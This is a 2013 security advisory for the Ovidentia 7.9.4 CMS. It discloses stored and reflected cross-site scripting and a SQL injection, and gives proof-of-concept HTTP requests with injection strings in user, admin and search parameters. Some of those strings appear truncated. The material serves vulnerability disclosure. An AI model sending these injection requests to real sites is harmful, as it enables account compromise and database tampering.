Ovidentia 7.9.4 Multiple Remote Vulnerabilities Vendor: Cantico Product web page: http://www.ovidentia.org Affected version: 7.9.4 Summary: Ovidentia is both a content management system (CMS) and a collaborative environment (Groupware). Desc: Input passed via several parameters is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and HTML/script code in a user's browser session in context of an affected site. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.7 MySQL 5.5.25a Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5154 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5154.php 08.08.2013 --- ============================================================ #1 - Stored XSS ------------------------------------------------------------ POST http://localhost/ovidentia/index.php HTTP/1.1 tg users idx Create pos A grp widget_filepicker_job_uid[] 52154a53cc0de user[nickname] "> user[password1] pass123 user[password2] pass123 user[notifyuser] 0 user[sendpwd] 0 user[sn] Testingusio user[mn] M user[givenname] Testa user[email] "> ============================================================ #2 - Stored XSS ------------------------------------------------------------ POST http://localhost/ovidentia/index.php HTTP/1.1 user[id] 2 tg user idx Modify item 2 pos grp widget_filepicker_job_uid[] 52154bde9410a user[nickname] test user[setpwd] 0 user[password1] user[password2] user[sendpwd] 0 user[sn] "> user[mn] M user[givenname] "> user[email] lab@zeroscience.mk GET http://localhost/ovidentia/index.php?tg=user&idx=Modify&item=2&pos=&grp= HTTP/1.1 ============================================================ #3 - Stored XSS ------------------------------------------------------------ POST http://localhost/ovidentia/index.php HTTP/1.1 Submit2 Update idx modify item 1 ovmldetail "> ovmlembedded "> tg admoc update ovmldb ============================================================ #4 - Reflected XSSs ------------------------------------------------------------ GET http://localhost/ovidentia/index.php?tg=users&bupd="> HTTP/1.1 GET http://localhost/ovidentia/index.php?tg=addon/widgets/groups&idx=get&id_parent=">&uid=widget_acl99&levels=2&id_delegation=0 GET http://localhost/ovidentia/index.php?tg=admoc&idx=addoc&item="> HTTP/1.1 GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A">&am p;grp=&sSearchText= HTTP/1.1 GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A&grp=&sSearchText="> HTTP/1.1 GET http://localhost/ovidentia/index.php?tg=admfm&idx=modify&fid=1"> HTTP/1.1 GET http://localhost/ovidentia/index.php?idx=options&tg=calopt&urla=javascript:prompt(13); HTTP/1.1 GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1_&tg=usrTskMgr GET http://localhost/ovidentia/index.php?ids=1"onmouseover=prompt(16)>&idx=hpriv&tg=topman ============================================================ #5 - SQL Injection ------------------------------------------------------------ GET http://localhost/ovidentia/index.php?tg=admoc&idx=octypes&action=delete_type&item=1%27&entitytype=2 # Iranian Exploit DataBase = http://IeDb.Ir [2013-08-22]